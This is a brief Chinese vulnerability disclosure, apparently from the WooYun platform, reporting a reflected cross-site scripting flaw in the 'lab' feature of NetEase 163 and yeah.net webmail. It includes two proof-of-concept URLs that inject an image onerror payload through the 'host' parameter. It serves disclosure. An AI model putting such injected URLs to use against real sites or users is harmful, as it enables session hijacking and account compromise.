网易系列邮箱实验室功能模块非持久型跨站~只测试了163、yeah邮箱均存在，估计其他系列的邮箱也存在。因为要用户登录情况下才触发。所以此处我把邮箱名用user代替！另外sid令牌即使随便给一个值可以弹框框，不知道这个令牌检查是否严格。这个也算一个漏洞吧~

漏洞证明：

http://lab.mail.yeah.net/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@yeah.net&host=webmail.mail.yeah.net%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590

http://lab.mail.163.com/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@163.com&host=webmail.mail.163.com%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590

作者Cryin@乌云